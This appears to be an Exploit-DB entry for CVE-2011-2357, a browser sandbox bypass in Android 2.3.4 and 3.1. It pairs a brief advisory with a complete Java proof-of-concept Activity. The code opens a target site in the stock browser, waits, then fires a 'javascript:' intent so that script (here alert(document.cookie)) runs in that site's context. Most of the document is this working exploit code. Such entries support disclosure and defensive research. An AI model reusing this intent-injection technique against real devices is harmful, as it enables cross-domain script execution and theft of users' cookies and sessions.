Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass

Author: Roee Hay
type: remote
platform: multiple
port: 
date_added: 2011-08-02 
date_updated: 2015-02-07 
verified: 1 
codes: CVE-2011-2357;OSVDB-74260 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/48954/info

Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox.

Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.

Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected.

public class CasExploit extends Activity
{
   static final String mPackage = "com.android.browser";
   static final String mClass = "BrowserActivity";
   static final String mUrl = "http://target.domain/";;
   static final String mJavascript = "alert(document.cookie)";
   static final int mSleep = 15000;

   @Override
   public void onCreate(Bundle savedInstanceState) {
      super.onCreate(savedInstanceState);
      setContentView(R.layout.main);
      startBrowserActivity(mUrl);
         try {
             Thread.sleep(mSleep);
         }
         catch (InterruptedException e) {}
         startBrowserActivity("javascript:" + mJavascript);
   }

   private void startBrowserActivity(String url) {
      Intent res = new Intent("android.intent.action.VIEW");
      res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
      res.setData(Uri.parse(url));
      startActivity(res);
   }
}